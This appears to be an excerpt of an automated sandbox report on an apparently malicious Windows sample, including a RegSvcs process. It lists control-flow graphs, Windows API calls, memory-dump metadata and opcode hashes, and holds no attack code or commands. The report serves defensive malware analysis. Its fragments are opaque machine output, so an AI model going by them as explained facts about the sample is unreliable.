LoadLibraryExW 15025->15027 15026->15007 15027->15026 15029 109b220 LoadLibraryExW 15028->15029 15031 109b299 15029->15031 15031->15022 15032 109d040 15033 109d086 GetCurrentProcess 15032->15033 15035 109d0d8 GetCurrentThread 15033->15035 15036 109d0d1 15033->15036 15037 109d10e 15035->15037 15038 109d115 GetCurrentProcess 15035->15038 15036->15035 15037->15038 15039 109d14b 15038->15039 15040 109d173 GetCurrentThreadId 15039->15040 15041 109d1a4 15040->15041

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 109d031-109d0cf GetCurrentProcess 298 109d0d8-109d10c GetCurrentThread 294->298 299 109d0d1-109d0d7 294->299 300 109d10e-109d114 298->300 301 109d115-109d149 GetCurrentProcess 298->301 299->298 300->301 303 109d14b-109d151 301->303 304 109d152-109d16d call 109d618 301->304 303->304 307 109d173-109d1a2 GetCurrentThreadId 304->307 308 109d1ab-109d20d 307->308 309 109d1a4-109d1aa 307->309 309->308
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0109D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0109D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0109D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0109D191
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 5cf04a21f1f84297ce3b39dcbacece0a996ad1ee7182bb372ffc4fa3e88f09c0
                                              • Instruction ID: dc06d74dddae99128644e12fc9c28c366546d8727aa3b2c717d56a53209197cf
                                              • Opcode Fuzzy Hash: 5cf04a21f1f84297ce3b39dcbacece0a996ad1ee7182bb372ffc4fa3e88f09c0
                                              • Instruction Fuzzy Hash: 695133B19003498FDB58DFA9D548BDEBBF1AF89304F20C469E449A73A0DB349984CF65

                                              Control-flow Graph

                                              control_flow_graph 316 109d040-109d0cf GetCurrentProcess 320 109d0d8-109d10c GetCurrentThread 316->320 321 109d0d1-109d0d7 316->321 322 109d10e-109d114 320->322 323 109d115-109d149 GetCurrentProcess 320->323 321->320 322->323 325 109d14b-109d151 323->325 326 109d152-109d16d call 109d618 323->326 325->326 329 109d173-109d1a2 GetCurrentThreadId 326->329 330 109d1ab-109d20d 329->330 331 109d1a4-109d1aa 329->331 331->330
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0109D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0109D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0109D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0109D191
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: f88c219559c87a04535fad1f85d5fd9421d79770ad2df10454525db8ff302df3
                                              • Instruction ID: 8f0938e9423a69bd143c08bc50cd69a125b22098e1d05d94e732675ecc66a64f
                                              • Opcode Fuzzy Hash: f88c219559c87a04535fad1f85d5fd9421d79770ad2df10454525db8ff302df3
                                              • Instruction Fuzzy Hash: 455134B19003098FDB58DFA9D548B9EBBF1EF88304F20C459E449A73A0DB349984CF65

                                              Control-flow Graph

                                              control_flow_graph 360 109ada8-109adb7 361 109adb9-109adc6 call 109a0cc 360->361 362 109ade3-109ade7 360->362 367 109adc8 361->367 368 109addc 361->368 363 109ade9-109adf3 362->363 364 109adfb-109ae3c 362->364 363->364 371 109ae49-109ae57 364->371 372 109ae3e-109ae46 364->372 415 109adce call 109b030 367->415 416 109adce call 109b040 367->416 368->362 374 109ae59-109ae5e 371->374 375 109ae7b-109ae7d 371->375 372->371 373 109add4-109add6 373->368 376 109af18-109afd8 373->376 377 109ae69 374->377 378 109ae60-109ae67 call 109a0d8 374->378 379 109ae80-109ae87 375->379 410 109afda-109afdd 376->410 411 109afe0-109b00b GetModuleHandleW 376->411 383 109ae6b-109ae79 377->383 378->383 381 109ae89-109ae91 379->381 382 109ae94-109ae9b 379->382 381->382 386 109aea8-109aeaa call 109a0e8 382->386 387 109ae9d-109aea5 382->387 383->379 390 109aeaf-109aeb1 386->390 387->386 391 109aebe-109aec3 390->391 392 109aeb3-109aebb 390->392 394 109aee1-109aeee 391->394 395 109aec5-109aecc 391->395 392->391 400 109af11-109af17 394->400 401 109aef0-109af0e 394->401 395->394 396 109aece-109aede call 109a0f8 call 109a108 395->396 396->394 401->400 410->411 412 109b00d-109b013 411->412 413 109b014-109b028 411->413 412->413 415->373 416->373
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFFE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f2c7bdf1a47819062a9c099e01a08d695a3a71e44d5d0ef64eda6d904e2ecadf
                                              • Instruction ID: bc6f6ea481f876d3e94a8b22d26e1e270fcd0b85f4782e0357a22671cccb6299
                                              • Opcode Fuzzy Hash: f2c7bdf1a47819062a9c099e01a08d695a3a71e44d5d0ef64eda6d904e2ecadf
                                              • Instruction Fuzzy Hash: 2E7135B0A00B05CFDB64DF2AD06479ABBF1BF88304F108A6DE086D7A50D735E845CB90

                                              Control-flow Graph

                                              control_flow_graph 417 109590d-1095913 418 109591c-10959d9 CreateActCtxA 417->418 420 10959db-10959e1 418->420 421 10959e2-1095a3c 418->421 420->421 428 1095a4b-1095a4f 421->428 429 1095a3e-1095a41 421->429 430 1095a51-1095a5d 428->430 431 1095a60 428->431 429->428 430->431 432 1095a61 431->432 432->432
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: ac77e42fa2e66eb13dc8bf84aec7bef8685ec972c027225ba1c156ec99668252
                                              • Instruction ID: d4bc70eb73b6ae6db62d6e2239fc32e9da80e625f498703ac4529fda9aedaca4
                                              • Opcode Fuzzy Hash: ac77e42fa2e66eb13dc8bf84aec7bef8685ec972c027225ba1c156ec99668252
                                              • Instruction Fuzzy Hash: 7D41DFB1C00719CEDB24CFAAC8847CDBBF5BF48304F2481AAD448AB255DB796985CF90

                                              Control-flow Graph

                                              control_flow_graph 434 10944b0-10959d9 CreateActCtxA 437 10959db-10959e1 434->437 438 10959e2-1095a3c 434->438 437->438 445 1095a4b-1095a4f 438->445 446 1095a3e-1095a41 438->446 447 1095a51-1095a5d 445->447 448 1095a60 445->448 446->445 447->448 449 1095a61 448->449 449->449
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: f1df8a376ca4f0ee6be059e77b8981cf583c3b26a85ff3b50754459d3f3aa5ee
                                              • Instruction ID: 33c8beb27cfaadf4dec67136dfde80a15107085af5729525ab868afa8094fd09
                                              • Opcode Fuzzy Hash: f1df8a376ca4f0ee6be059e77b8981cf583c3b26a85ff3b50754459d3f3aa5ee
                                              • Instruction Fuzzy Hash: B641C2B0C00719CBDB24DFAAC844B9DBBF5BF49304F24806AD448AB255DB756985CF90

                                              Control-flow Graph

                                              control_flow_graph 451 109d751-109d758 452 109d75a-109d87e 451->452 453 109d714-109d724 DuplicateHandle 451->453 454 109d72d-109d74a 453->454 455 109d726-109d72c 453->455 455->454
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 060006f1c80be2207dde1b65355497622595a6ea4c3ba9b4bb561eadf85d913c
                                              • Instruction ID: 0604ae92a321285a9e48c3b39979f9a7fc501b98a5c3d767e0e0ac913bba6ce0
                                              • Opcode Fuzzy Hash: 060006f1c80be2207dde1b65355497622595a6ea4c3ba9b4bb561eadf85d913c
                                              • Instruction Fuzzy Hash: B4315275A413808FE714AF60F4597693BA2FB88310F11853AE9158B7D8EBB84885CF51

                                              Control-flow Graph

                                              control_flow_graph 469 109d690-109d724 DuplicateHandle 470 109d72d-109d74a 469->470 471 109d726-109d72c 469->471 471->470
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: c7c18445ae463d6cfe0dda799b004cd44278f882711756e0cc9c4dc28a5db58a
                                              • Instruction ID: 5c0fe0a96cdf5f1e1c6a17bcea73bf80a28be32daa446116d23d2929eea9852b
                                              • Opcode Fuzzy Hash: c7c18445ae463d6cfe0dda799b004cd44278f882711756e0cc9c4dc28a5db58a
                                              • Instruction Fuzzy Hash: F621E4B59002489FDB10CF9AD584ADEFFF4FB48310F14801AE954A3310D374A940CFA4

                                              Control-flow Graph

                                              control_flow_graph 474 109d689-109d724 DuplicateHandle 475 109d72d-109d74a 474->475 476 109d726-109d72c 474->476 476->475
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a8eab752269d4c6878a85136993112cf93c15e53e99185c63a8b7066a90a1a69
                                              • Instruction ID: 92e22d50e259a2d15d384380e7fecad4e5baedd8f4a44b12dda9a220b138cfb4
                                              • Opcode Fuzzy Hash: a8eab752269d4c6878a85136993112cf93c15e53e99185c63a8b7066a90a1a69
                                              • Instruction Fuzzy Hash: F821E2B59002589FDB10CFA9D584AEEFFF4FB48314F14842AE958A3310D378A940CFA4

                                              Control-flow Graph

                                              control_flow_graph 479 109a130-109b260 481 109b268-109b297 LoadLibraryExW 479->481 482 109b262-109b265 479->482 483 109b299-109b29f 481->483 484 109b2a0-109b2bd 481->484 482->481 483->484
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1b0517bf84f2ca64ac7083fdbeb30af3966ac2f76d8efd98b6b07bbd7c030d75
                                              • Instruction ID: ddbad9ebbcf6ee112599fa98088b6e9defebf9b72e39e8bcba8c77f9048de224
                                              • Opcode Fuzzy Hash: 1b0517bf84f2ca64ac7083fdbeb30af3966ac2f76d8efd98b6b07bbd7c030d75
                                              • Instruction Fuzzy Hash: 091123B69003089FDB10CF9AD444ADEFBF4EB88320F10846AE559A7250C375A945CFA4

                                              Control-flow Graph

                                              control_flow_graph 487 109b218-109b260 488 109b268-109b297 LoadLibraryExW 487->488 489 109b262-109b265 487->489 490 109b299-109b29f 488->490 491 109b2a0-109b2bd 488->491 489->488 490->491
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1b4345065484ff0b7a784736642a9b8171e5d60bef612e16d12c40c10d5f2609
                                              • Instruction ID: 280b828e5eb8d89c64de28b23a077d5defd1be10b5f35ad388dc6a9d7efa9b3b
                                              • Opcode Fuzzy Hash: 1b4345065484ff0b7a784736642a9b8171e5d60bef612e16d12c40c10d5f2609
                                              • Instruction Fuzzy Hash: 221120B68003098FDB14CFAAD584ADEFBF4EF48320F14846AD559A7210C379A545CFA4

                                              Control-flow Graph

                                              control_flow_graph 494 109af98-109afd8 495 109afda-109afdd 494->495 496 109afe0-109b00b GetModuleHandleW 494->496 495->496 497 109b00d-109b013 496->497 498 109b014-109b028 496->498 497->498
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFFE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d37f91c9a28b84599ba4a1006ea8800aeaa781481cb1e3e1c73bf34c6a5e0cc0
                                              • Instruction ID: 80653a83d89ebb3b169eb85d7e07054d35b2e196e8e855f06ef91004bf9ab0f9
                                              • Opcode Fuzzy Hash: d37f91c9a28b84599ba4a1006ea8800aeaa781481cb1e3e1c73bf34c6a5e0cc0
                                              • Instruction Fuzzy Hash: BF110FB6C002498FDB10CF9AD444ADEFBF4AF88324F10846AD568A7210D379A545CFA5
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b478acb41d6e35150babe199a6e17ccf4f913dcb5788893ddceb14196095240c
                                              • Instruction ID: 73e1c882a7b4d51372d212b719ae363beabc241068c4299dc481886a9ddd48f7
                                              • Opcode Fuzzy Hash: b478acb41d6e35150babe199a6e17ccf4f913dcb5788893ddceb14196095240c
                                              • Instruction Fuzzy Hash: EF213871100280DFCB069F54D9C4B1ABFA9FBC8314F6086A9E9890B256C336C416CB61
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 309d47d8d4266424f26ecbcde6ec25b040e377fb58eaa6ce7c3e4e6e73744e8d
                                              • Instruction ID: 814305526fa616d892e9c51504475fc97c92e9484ae38cc316f5a6a34ccb22b2
                                              • Opcode Fuzzy Hash: 309d47d8d4266424f26ecbcde6ec25b040e377fb58eaa6ce7c3e4e6e73744e8d
                                              • Instruction Fuzzy Hash: 7F214571500200DFDB01DF58D9C0B6ABFA9FBC8324F60C1A9E9490B256C736E456CBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cef8a39b8cb8b5e4319ef6af14a6365c3f182e9fc8e9e7118fc9f0bd6f03bebd
                                              • Instruction ID: 6b4fe3a4733f3ec250aa5899b1bebde4bd77681ab4f2b75bea15823bc13e8da7
                                              • Opcode Fuzzy Hash: cef8a39b8cb8b5e4319ef6af14a6365c3f182e9fc8e9e7118fc9f0bd6f03bebd
                                              • Instruction Fuzzy Hash: 58212CB1504200EFDB05DF54D6C4B16BBA5FBA4324F20C6BDE9894B356C336D446CB61
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 639c1757d3613f2fa6e0144541520da4e5d2a7137929a46c6beda987c6d1701c
                                              • Instruction ID: 103ff5ac53d051d23971160f3018b7df7ffb382e73dc49d39f19f74b64964db6
                                              • Opcode Fuzzy Hash: 639c1757d3613f2fa6e0144541520da4e5d2a7137929a46c6beda987c6d1701c
                                              • Instruction Fuzzy Hash: 952122B1604200DFCB15DF98D9C4B2ABFA5EB94314F20C5BDE98A4B256C33AD447CB61
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d6a77f5825052a1563486c88cd7e16a29689ea930333889f0415dbb28d320bc
                                              • Instruction ID: 277b8822aa24c626f9b7bd2a92ee3aded357927e7239c5be18b6242e2db02109
                                              • Opcode Fuzzy Hash: 1d6a77f5825052a1563486c88cd7e16a29689ea930333889f0415dbb28d320bc
                                              • Instruction Fuzzy Hash: 062195B55083809FCB03CF54D9D4711BFB1EB56214F24C5EAD8898F2A7C33A9806CB62
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction ID: ebed4ad979de76a6db662f967183622f38af0b434fa98b92a65cb3ac15291ec8
                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction Fuzzy Hash: 4A219D76504280DFDB07CF54D9C4B16BFB2FB88314F24C6A9D9490B256D33AD426DB91
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction ID: 8bbf5e04af65d382927f0d222efa85a89b4f23173b2eda0c65918aa14c9d2717
                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction Fuzzy Hash: 83110372404240CFDB02CF54D5C4B56BFB1FB94324F24C2A9D9490B257C33AE45ACBA1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 4164bd15fcb9eee1ddce46ab03148a32035fb5fd5c5ccad4b28e9c69ac413efe
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 3911BBB5504280DFDB02DF54C6C4B15BFA1FB94224F24C6AAD8894B296C33AD40ACB61
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 358ef5a2393db4eb3017fa03f1a50b9186ae4906ae95a60fb32405b253090a55
                                              • Instruction ID: 21466dad7aa7472f02047fb033583ced6ef4877d91c43bbc545704a65cd939a0
                                              • Opcode Fuzzy Hash: 358ef5a2393db4eb3017fa03f1a50b9186ae4906ae95a60fb32405b253090a55
                                              • Instruction Fuzzy Hash: EA012B31409340DAE7118B69CD84767FFECEF81324F58C8AAED4C1A286D279E841C7B1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1d5c7e480f36c86bd30c9b63817b84484acd603ae64f6c1dc5ea2b85fb06cbb
                                              • Instruction ID: b776517fdc8152eb4ff8a9314c94d315a6c82d834239187fa51d730ffa5937f2
                                              • Opcode Fuzzy Hash: d1d5c7e480f36c86bd30c9b63817b84484acd603ae64f6c1dc5ea2b85fb06cbb
                                              • Instruction Fuzzy Hash: DCF06271405344AAE7118F1AD984B62FFECEF81724F18C89AED4C5A286C279A845CBB1

                                              Execution Graph

                                              Execution Coverage:13.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:26
                                              Total number of Limit Nodes:5
• Graph (rendering not reproduced in text): root dc0848 reaches dc148e and dc1382, which lead on to dc7ea8 and to 614d9e0/614d9f0; GlobalMemoryStatusEx is called from dc148e, dc7ea8, 614dc31 and 614de88, each inside a loop back to its caller.
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45eed6ac58b00d1ccb10af4b9a8d9d4d765f539647f8c1b1c2ccfbffc4074049
                                              • Instruction ID: b903f8db62d9f47246b29b6cc4620c58add7878a3e1f48abc01aaa663f754ac1
                                              • Opcode Fuzzy Hash: 45eed6ac58b00d1ccb10af4b9a8d9d4d765f539647f8c1b1c2ccfbffc4074049
                                              • Instruction Fuzzy Hash: 9653F731C10B1A8ACB55EF68C880699F7B1FF99300F55D79AE4587B125EF70AAC4CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: 8c29249dfc49d5f755bb93cf53df8c4e2f007aada37561789cd648dccfe11ce2
                                              • Instruction ID: da312d451ecf21ad083908f8990c4c953d7c1234392be3aed025d2331416cefd
                                              • Opcode Fuzzy Hash: 8c29249dfc49d5f755bb93cf53df8c4e2f007aada37561789cd648dccfe11ce2
                                              • Instruction Fuzzy Hash: 9B915C70E0020ACFDF14CFA9C991B9EBBF2AF48314F18852DE455A7254EB749985CBA1
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e87e09f6e5a4b029d6335d25164538b97768eb7b50dc5e367c316535dbeeb2a7
                                              • Instruction ID: 936aac8e34b32f3074ece46d853c9907f7bee414f0cf800c2d85cce4634c8225
                                              • Opcode Fuzzy Hash: e87e09f6e5a4b029d6335d25164538b97768eb7b50dc5e367c316535dbeeb2a7
                                              • Instruction Fuzzy Hash: 31B13F70E0020ACFDB14DFA9C995B9DBBF2AF88314F18852DD815EB254EB74D845CB91

Control-flow Graph
• Basic blocks dc4804-dc4a5c; internal calls to dc0ab8 from blocks dc4a17-dc4a1a and dc4a2b-dc4a2e; no Windows API calls; the final block dc4a5c loops on itself (graph rendering not reproduced in text).
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: c7181bb2f1646f054af906fb11b0001ed83a9ddd30940d6667debf8c7d37c293
                                              • Instruction ID: 34491c0781fda876bec9f76920c2994b54790617ba3c36dc275cc4d9db9ac142
                                              • Opcode Fuzzy Hash: c7181bb2f1646f054af906fb11b0001ed83a9ddd30940d6667debf8c7d37c293
                                              • Instruction Fuzzy Hash: A7716AB0E0025ACFDB10CFA9C991B9EBBF1AF48314F14812DE415EB254EB749846CFA5

Control-flow Graph
• Basic blocks dc4810-dc4a5c (same body as the dc4804 function above, entered at dc4810); internal calls to dc0ab8 from blocks dc4a17-dc4a1a and dc4a2b-dc4a2e; no Windows API calls; the final block dc4a5c loops on itself (graph rendering not reproduced in text).
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 4fbd5ca5b5f6ff59a5d559878610bc70f717d12881c7c905935629ed162ceba8
                                              • Instruction ID: 2c7462ec4221595bce271d1c816fc0d0c6497c928a12d263729caa6ad10ac9b8
                                              • Opcode Fuzzy Hash: 4fbd5ca5b5f6ff59a5d559878610bc70f717d12881c7c905935629ed162ceba8
                                              • Instruction Fuzzy Hash: 64715C70E0025ACFDB14CFA9C991B9EBBF2AF48314F14812DE415EB254EB749845CFA5

Control-flow Graph
• Basic blocks 614e950-614eadd; calls 614d1d0 (block 614e96d-614e994) and 614e550 (block 614e995-614e9b4); GlobalMemoryStatusEx is called in block 614ea1f-614eaac (graph rendering not reproduced in text).
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4116434515.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_6140000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65f74cf4d0bf879ccd317de21cd8b90367f7ee4b276bae76b13a1cde88abbc52
                                              • Instruction ID: 69cc4c53e486d1e9eb1e51ac61476957be67849bf662befaa3e734660976b80f
                                              • Opcode Fuzzy Hash: 65f74cf4d0bf879ccd317de21cd8b90367f7ee4b276bae76b13a1cde88abbc52
                                              • Instruction Fuzzy Hash: 0E412472D003599FCB14DF69D8042DEBFF6BF89310F15856AE808EB251EB349885CBA1
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0614EA9F
                                              Memory Dump Source
